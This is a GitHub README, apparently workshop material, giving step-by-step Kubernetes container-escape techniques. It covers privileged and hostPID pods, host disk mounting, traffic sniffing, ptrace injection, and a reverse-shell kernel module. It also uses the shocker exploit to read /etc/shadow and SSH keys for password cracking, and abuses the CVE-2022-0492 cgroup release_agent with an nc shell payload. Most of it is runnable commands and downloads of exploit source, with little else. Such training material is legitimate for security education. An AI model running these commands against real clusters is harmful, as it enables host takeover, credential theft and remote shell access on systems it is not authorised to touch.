Skip to content

Latest commit

 

History

History
252 lines (191 loc) · 6.83 KB

README.md

File metadata and controls

252 lines (191 loc) · 6.83 KB

TagesConf: container escape

Setting Up Workspace

Start kubernetes cluster with Killercode Kubernetes.

Privileged

Let's play with linux namespaces, cgroups

On Host

ls -l /proc/$$/ns # on the host

In container

ls -l /proc/$$/ns # in the container
capsh --print

Privileged+hostPID

Run privileged pod

kubectl apply -f https://raw.githubusercontent.com/paraddise/TagesConf-ContainerEscapes/main/privileged/priv-hostpid.yaml
kubectl exec -it privileged-hostpid -- bash

Enter to pid 1 namespaces.

ls -la /
ps auxf
nsenter --target 1 --mount --uts --ipc --net --pid -- bash
ls -la /

Mounting Disk

kubectl apply -f https://raw.githubusercontent.com/paraddise/TagesConf-ContainerEscapes/main/privileged/priv.yaml
kubectl exec -it privileged -- bash

Find device mounted to host root.

cat /proc/cmdline
blkid

Mount device or explore it

mount -o ro /dev/vda1 /mnt
ls -la /mnt
# or
debugfs /dev/vda1

References:

hostNetwork

Deploy pods

kubectl apply -f https://raw.githubusercontent.com/paraddise/TagesConf-ContainerEscapes/main/host_network/nginx.yaml
kubectl apply -f https://raw.githubusercontent.com/paraddise/TagesConf-ContainerEscapes/main/host_network/pod.yaml
kubectl get svc nginx
kubectl logs -f nginx-client
kubectl exec -it host-network -- bash

Sniff requests

ifconfig
tcpdump -i any -v 'tcp and host 10.110.149.83'

Excessive Capabilities

CAP_SYS_PTRACE + hostPid

Spawn container

kubectl apply -f https://raw.githubusercontent.com/paraddise/TagesConf-ContainerEscapes/main/cap_sys_ptrace/pod.yaml
kubectl exec -it cap-sys-ptrace -- bash

Check that we have ptrace capability

capsh --print | grep ptrace

gdb <pid>
# or
./cdk run check-ptrace
curl -L -o inject.c https://raw.githubusercontent.com/paraddise/TagesConf-ContainerEscapes/main/cap_sys_ptrace/inject.c
gcc ./inject.c -o inject
./inject
nc 192.168.0.0 5600
/usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'

References:

CAP_SYS_MODULE

Deploy pod

kubectl apply -f https://raw.githubusercontent.com/paraddise/TagesConf-ContainerEscapes/main/cap_sys_module/pod.yaml
kubectl exec -it cap-sys-module -- bash

Print kernel version, architecture, hostname and build date

uname -a

Read kernel's boot image and the root UUID.

cat /proc/cmdline

Install linux-headers

apt install linux-headers-$(uname -r)

Change address to connect and compile module

curl -L -o Makefile https://raw.githubusercontent.com/paraddise/TagesConf-ContainerEscapes/main/cap_sys_module/Makefile
curl -L -o reverse-shell.c https://raw.githubusercontent.com/paraddise/TagesConf-ContainerEscapes/main/cap_sys_module/reverse-shell.c
ifconfig
vim reverse-shell.c
make

Start listenning no port 4444 for reverse shell and install module.

nc -klvnp 4444 &
insmod reverse-shell.ko

If you want to install module again, remove it before installing

rmmod reverse-shell.ko

Getting Full TTY

/usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'

References:

CAP_DAC_READ_SEARCH

Create pod

kubectl apply -f https://raw.githubusercontent.com/paraddise/TagesConf-ContainerEscapes/main/cap_dac_read_search/pod.yaml
kubectl exec -it cap-dac-read-search -- bash

Compile shocker exploit

curl -LO https://raw.githubusercontent.com/paraddise/TagesConf-ContainerEscapes/main/cap_dac_read_search/shocker.c
gcc ./shocker.c -o ./shocker

Find interesting file, foe example /etc/passwd and /etc/shadow

./shocker /etc/passwd passwd
./shocker /etc/shadow shadow
unshadow passwd shadow > unshadow.txt
john unshadow.txt

So you bruteforce ubuntu password, let's try to connect with it

ssh ubuntu@192.168.0.0

So, imagine that you didn't managed to bruteforce password, let's try to find some ssh keys.

./shocker /root/.ssh/id_rsa id_rsa
chmod 0600 id_rsa
ssh -i id_rsa root@192.168.1.0

References:

CAP_DAC_OVERRIDE + CAP_DAC_READ_SEARCH

Same as above, but you can write to any file now. Just overwrite authorized_keys file.

curl -L -o shocker_write.c https://raw.githubusercontent.com/paraddise/TagesConf-ContainerEscapes/main/cap_dac_override/shocker_write.c

CAP_SYS_ADMIN

kubectl apply -f https://raw.githubusercontent.com/paraddise/TagesConf-ContainerEscapes/main/cap_sys_admin/pod.yaml
kubectl exec -it cap-sys-admin -- bash

References:

CVE-2022-0492

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
mount 
host_path=`mount | head -1 | sed -n 's/.*\perdir=\([^,]*\).*/\1/p'`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 51337 >/tmp/f' >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
nc 192.168.0.0 51337

References:

2 shells and mknode cap

We can escalate privileges when we have non-root user on the host and root in container.

References: